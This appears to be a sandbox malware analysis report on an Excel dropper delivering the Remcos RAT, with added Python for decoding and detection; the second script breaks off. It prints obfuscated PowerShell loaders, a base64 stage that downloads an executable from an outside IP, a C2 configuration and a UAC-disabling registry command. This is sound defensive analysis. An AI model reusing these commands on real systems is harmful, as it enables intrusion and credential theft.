
Windows Analysis Report
Quotation.xls

Overview

General Information

Sample name: Quotation.xls
Analysis ID: 1482857
MD5: 36cace5745dcb32c2ab03ca4ba433394
SHA1: 2e479ac4ea9b158f39093dded3b55c360a1f2082
SHA256: c2f6ea297ebee1570036db204177fde0e0263006637806e9b28365bb4ef14d7c
Tags: xls

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious Excel or Word document
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2932 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3296 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3376 cmdline: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3400 cmdline: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3512 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • winiti.exe (PID: 3608 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
            • InstallUtil.exe (PID: 3660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: AF862061889F5B9B956E9469DCDAE773)
    • mshta.exe (PID: 3828 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3912 cmdline: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3936 cmdline: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 4020 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 4032 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • winiti.exe (PID: 4076 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
            • MSBuild.exe (PID: 1808 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: C1BE61F3DE532751D6C1A35B851B0367)
            • AddInProcess32.exe (PID: 2480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
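The cmd.exe / powershell.exe command lines in the tree above carry a two-stage loader. The flags are -ExecutionPolicy Bypass (-ex), -NoProfile (-nop), -WindowStyle 1 (Hidden, -w 1) and -Command (-c). The inner Iex builds the string [System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String("...")) out of single-quoted fragments glued together with [char] casts (0x3A and 58 are both ':', 34 is '"'), and the outer IEx runs whatever that base64 decodes to, so the real script never appears on the command line. The Python below is an added example, not part of the Joe Sandbox report: it statically folds such a chain and decodes the embedded stage without executing any PowerShell. Its sample command line is constructed from the one in the tree, but the base64 body is a placeholder script of our own because the report elides the real one, and the keyword list behind case_anomalies is our own heuristic approximating the report's "PowerShell case anomaly found" signature, not Joe Sandbox's or the Sigma rule's logic.

```python
import base64
import re

# Constructed sample, modelled on the cmd.exe / powershell.exe command line in the
# process tree above. The base64 body is our own placeholder script, NOT the
# sample's real second stage (the report elides it).
SAMPLE_PAYLOAD = '$u = "http://example.invalid/stage2.exe"; Start-Process $u'
SAMPLE_CMDLINE = (
    "POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; "
    "IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58"
    "+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A"
    "+'fRoMbASe64strinG('+[Char]34+'"
    + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-8")).decode("ascii")
    + "'+[CHAr]34+'))')))"
)

# Grammar of the obfuscation: single-quoted literals and [char]N casts joined by '+'.
_LITERAL = r"'(?:[^']|'')*'"                      # '' inside a literal is an escaped quote
_CHARCAST = r"\[char\]\s*(?:0x[0-9a-f]+|\d+)"     # [char]0x3A, [char]58, ...
_CHAIN = rf"{_LITERAL}(?:\s*\+\s*(?:{_LITERAL}|{_CHARCAST}))*"
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
# The inner Iex(...) whose argument is such a chain. The outer IEx($(...)) never
# matches because its argument starts with '$', not with a quote.
_INNER_IEX = re.compile(rf"\biex\(\s*({_CHAIN})\s*\)", re.IGNORECASE)
_B64_CALL = re.compile(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)


def fold_concat(expr):
    """Statically evaluate 'lit'+[char]N+'lit'... into one string; nothing is executed."""
    parts, pos = [], 0
    for m in _TOKEN.finditer(expr):
        gap = expr[pos:m.start()].strip()
        if gap not in ("", "+"):
            raise ValueError(f"not a pure concatenation chain near {gap!r}")
        if m.group(1) is not None:
            parts.append(m.group(1).replace("''", "'"))
        else:
            parts.append(chr(int(m.group(2), 0)))  # base 0 accepts both 0x3A and 58
        pos = m.end()
    return "".join(parts)


def stage1_from_cmdline(cmdline):
    """Recover the string the inner Iex builds (the stage-1 decoder expression)."""
    m = _INNER_IEX.search(cmdline)
    if not m:
        raise ValueError("no Iex('...'+[char]N+...) chain found")
    return fold_concat(m.group(1))


def payload_from_stage1(stage1):
    """Decode the FromBase64String("...") argument the way Utf8.GetString would."""
    m = _B64_CALL.search(stage1)
    if not m:
        raise ValueError('no FromBase64String("...") call in stage 1')
    return base64.b64decode(m.group(1)).decode("utf-8")


# Our own heuristic approximating the report's "PowerShell case anomaly found"
# signature: a known keyword whose casing is neither lower, UPPER nor Capitalised.
KEYWORDS = {"powershell", "bypass", "iex", "nop", "frombase64string", "getstring"}


def case_anomalies(cmdline):
    hits = []
    for tok in re.findall(r"[A-Za-z][A-Za-z0-9]*", cmdline):
        normal = (tok.lower(), tok.upper(), tok.capitalize())
        if tok.lower() in KEYWORDS and tok not in normal and tok not in hits:
            hits.append(tok)
    return hits


def analyse(cmdline):
    stage1 = stage1_from_cmdline(cmdline)
    return {
        "stage1": stage1,
        "payload": payload_from_stage1(stage1),
        "case_anomalies": case_anomalies(cmdline),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

On the real command line the recovered payload is the script whose base64 is partially visible in the System Summary section below (an Add-Type P/Invoke of urlmon!URLDownloadToFile fetching csrss.exe); feed that string to payload_from_stage1 once the full base64 has been carved from the process-creation event.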
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration (Remcos)

{"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Overview: Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta | Rule: JoeSecurity_Obshtml | Description: Yara detected obfuscated html page | Author: Joe Security

Yara Overview: Memory Dumps

Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:
(table truncated: 18 entries in total)

Yara Overview: Unpacked PEs

Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:
(table truncated: 43 entries in total)

            System Summary

Source: File created | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2932, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2932, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3296, ProcessName: mshta.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3400, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", ProcessId: 3512, ProcessName: csc.exe
Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2932, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3400, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2932, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3400, TargetFilename: C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2932, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))", CommandLine: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3400, TargetFilename: C:\Users\user\AppData\Local\Temp\pyktbusk.55o.ps1
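Every Sigma hit above is a parent/child or image/path relation that can be read straight from Sysmon event ID 1 (process creation) together with the ID 11 file-creation events for the dropped .hta, .cmdline and csrss[1].exe files. The Python below is an added example, not part of the Joe Sandbox report and not the published Sigma rules' exact logic: it rebuilds process ancestry from constructed Sysmon-style events that mirror the PIDs and images of this report's tree (command lines shortened, plus a benign explorer.exe to notepad.exe pair as a control) and flags an Office application spawning a script host, mshta.exe spawning cmd.exe or powershell.exe, csc.exe compiling from the user's Temp directory, and an executable living under the user's AppData profile launching a .NET framework host (InstallUtil, MSBuild, AddInProcess32), which is what winiti.exe does here before the Remcos payload shows up inside those hosts. The rule names and the image allow-lists are our own approximations.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One Sysmon event ID 1 (process creation) record, reduced to what the rules need."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the PIDs and images of this report's process tree
# (command lines shortened), plus a benign explorer.exe -> notepad.exe pair as a control.
EVENTS = [
    ProcEvent(2932, 1, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    ProcEvent(3296, 2932, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\mshta.exe -Embedding"),
    ProcEvent(3376, 3296, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c ..."'),
    ProcEvent(3400, 3376, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"POWERsHElL.exe -ex BypAss -nop -w 1 -c ..."),
    ProcEvent(3512, 3400, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
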